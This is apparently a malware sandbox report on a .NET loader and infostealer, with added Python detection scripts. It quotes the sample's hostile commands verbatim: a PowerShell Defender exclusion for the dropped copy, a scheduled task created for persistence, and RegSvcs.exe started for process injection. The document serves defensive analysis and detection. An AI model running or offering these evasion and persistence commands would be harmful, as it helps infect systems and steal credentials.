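The "OriginalFilename ... vs SMBKT-20242005.exe" lines above are the sandbox comparing the OriginalFilename key of every version resource it finds in the process memory dumps with the name the sample actually ran under. Mismatches such as Tyrone.dll, SimpleLogin.dll and oaJU.exe are the embedded stages the loader decrypts and maps in memory; the clr.dll and PowerShell.EXE hits are ordinary loaded modules, so a mismatch is a lead to pull the region and unpack it, not a verdict on its own. The Python below is an added example, not part of the Joe Sandbox report, that reproduces the check over a raw memory dump or PE file by scanning for the UTF-16LE key; the sample blob is constructed inline and the 260-character cap on the value is an assumption taken from MAX_PATH.

```python
"""Find OriginalFilename version-resource values in a memory dump or PE file and
report the ones that do not match the on-disk name (added example, not sandbox code)."""
import re
from typing import List

# In VS_VERSIONINFO the key "OriginalFilename" (16 UTF-16LE chars + NUL) is followed
# directly by the NUL-terminated UTF-16LE value: the 6-byte String header plus the
# 34-byte key already lands on a 4-byte boundary, so no padding sits between them.
_KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"
# Value: 1..260 printable ASCII chars as UTF-16LE (assumed MAX_PATH cap), then the NUL terminator.
_PATTERN = re.compile(re.escape(_KEY) + rb"((?:[\x20-\x7e]\x00){1,260}?)\x00\x00")


def _version_entry(value: str) -> bytes:
    """Build one OriginalFilename key/value pair as it appears inside a version resource."""
    return _KEY + value.encode("utf-16-le") + b"\x00\x00"


# Constructed sample "dump": filler bytes around two version entries, mimicking a
# process that holds both its own resource and an injected stage (Tyrone.dll).
SAMPLE_BLOB = (
    b"\x00" * 64
    + b"MZ\x90\x00" + b"\xcc" * 32
    + _version_entry("Tyrone.dll")
    + b"\x41\x00" * 16
    + _version_entry("SMBKT-20242005.exe")
    + b"\x00" * 16
)


def original_filenames(blob: bytes) -> List[str]:
    """Return every OriginalFilename value found in the blob, in file order."""
    return [m.group(1).decode("utf-16-le") for m in _PATTERN.finditer(blob)]


def mismatches(blob: bytes, on_disk_name: str) -> List[str]:
    """OriginalFilename values that differ (case-insensitively) from the name the sample ran under."""
    wanted = on_disk_name.lower()
    return [name for name in original_filenames(blob) if name.lower() != wanted]


if __name__ == "__main__":
    for name in mismatches(SAMPLE_BLOB, "SMBKT-20242005.exe"):
        print(f"OriginalFilename{name} vs SMBKT-20242005.exe")
```

Run it against a `.sdmp` region exported from the sandbox, or a whole process dump, with the file name the sample was executed under; each reported name is a candidate embedded PE to carve at the preceding MZ header.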
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: SMBKT-20242005.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: joUXSCpr.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, roEs93G.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, roEs93G.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.cs | Security API names: _0020.SetAccessControl
Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.cs | Security API names: _0020.AddAccessRule
Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, RVSMvvC2GPKFxIWs0H.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, RVSMvvC2GPKFxIWs0H.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.cs | Security API names: _0020.SetAccessControl
Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@22/11@2/2
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | File created: C:\Users\user\AppData\Roaming\joUXSCpr.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Mutant created: \Sessions\1\BaseNamedObjects\WDHZBnHORSqPpNIwDQyWox
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | File created: C:\Users\user\AppData\Local\Temp\tmp6AB.tmp
Source: SMBKT-20242005.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SMBKT-20242005.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SMBKT-20242005.exe | ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | File read: C:\Users\user\Desktop\SMBKT-20242005.exe
Source: unknown | Process created: C:\Users\user\Desktop\SMBKT-20242005.exe "C:\Users\user\Desktop\SMBKT-20242005.exe"
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\joUXSCpr.exe C:\Users\user\AppData\Roaming\joUXSCpr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp"
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
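The process tree above is the whole execution chain in three commands, and the dropped copy joUXSCpr.exe repeats it on its own start: PowerShell adds a Defender path exclusion for the copy in %AppData%\Roaming, schtasks.exe registers the task "Updates\joUXSCpr" from an XML file written to %Temp%, and the loader starts an argument-less RegSvcs.exe that it then writes its payload into (the "Injects a PE file into a foreign processes" signature). The image paths sit under SysWOW64 even though the command lines name System32, because the sample is a 32-bit process and its child launches are redirected by WoW64; match on the image basename rather than the full path. The Python below is added detection logic, not part of the Joe Sandbox report, run over Sysmon Event ID 1 style records constructed from the command lines listed above; the parent of the first process, the trusted-parent list for RegSvcs.exe and the benign control event are assumptions for this example.

```python
"""Flag the three behaviours from the process tree above in process-creation events
(added example, not sandbox code). Field names follow Sysmon Event ID 1."""
import re
from typing import Dict, List

# Constructed sample events mirroring the report's process tree. The launcher of the
# first process and the last (benign) event are assumptions, not from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\user\Desktop\SMBKT-20242005.exe",
     "CommandLine": r'"C:\Users\user\Desktop\SMBKT-20242005.exe"'},
    {"ParentImage": r"C:\Users\user\Desktop\SMBKT-20242005.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
                    r'-ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"'},
    {"ParentImage": r"C:\Users\user\Desktop\SMBKT-20242005.exe",
     "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"'},
    {"ParentImage": r"C:\Users\user\Desktop\SMBKT-20242005.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    # Benign control (assumed): an installer registering a component, so RegSvcs gets an argument.
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" '
                    r'"C:\Program Files\Vendor\Component.dll"'},
]

# A task definition read from the per-user temp directory (matches the tmp*.tmp files above).
TEMP_XML_PATH = re.compile(r"\\AppData\\Local\\Temp\\[^\"]+", re.IGNORECASE)
# Parents from which an argument-less RegSvcs.exe is plausible; assumption for this example.
TRUSTED_REGSVCS_PARENTS = {"msiexec.exe", "setup.exe", "devenv.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _arguments(cmdline: str) -> str:
    """Drop the (possibly quoted) image path and return whatever arguments remain."""
    cmd = cmdline.strip()
    if cmd.startswith('"'):
        close = cmd.find('"', 1)
        return cmd[close + 1:].strip() if close != -1 else ""
    parts = cmd.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    image = _basename(event["Image"])            # basename sidesteps the WoW64 redirection
    parent = _basename(event["ParentImage"])
    cmd = event["CommandLine"]
    low = cmd.lower()
    hits: List[str] = []
    # Rule 1: Defender path exclusion added from the command line.
    if image == "powershell.exe" and "add-mppreference" in low and "-exclusionpath" in low:
        hits.append("defender_exclusion_added")
    # Rule 2: scheduled task created from an XML file in %Temp%.
    if image == "schtasks.exe" and "/create" in low and "/xml" in low and TEMP_XML_PATH.search(cmd):
        hits.append("scheduled_task_from_temp_xml")
    # Rule 3: RegSvcs.exe with no assembly argument, spawned by something other than an installer;
    # a legitimate RegSvcs run always names the assembly it is registering.
    if image == "regsvcs.exe" and not _arguments(cmd) and parent not in TRUSTED_REGSVCS_PARENTS:
        hits.append("regsvcs_no_args_untrusted_parent")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index to matched rules, keeping only events that matched something."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}


if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS).items():
        print(index, _basename(SAMPLE_EVENTS[index]["Image"]), rules)
```

Rule 3 is the noisy one: it is really a process-hollowing heuristic for any .NET utility the loader picks (RegSvcs.exe here, RegAsm.exe or MSBuild.exe in other builds), so in production pair it with the "Writes to foreign memory regions" telemetry rather than alerting on it alone.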
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
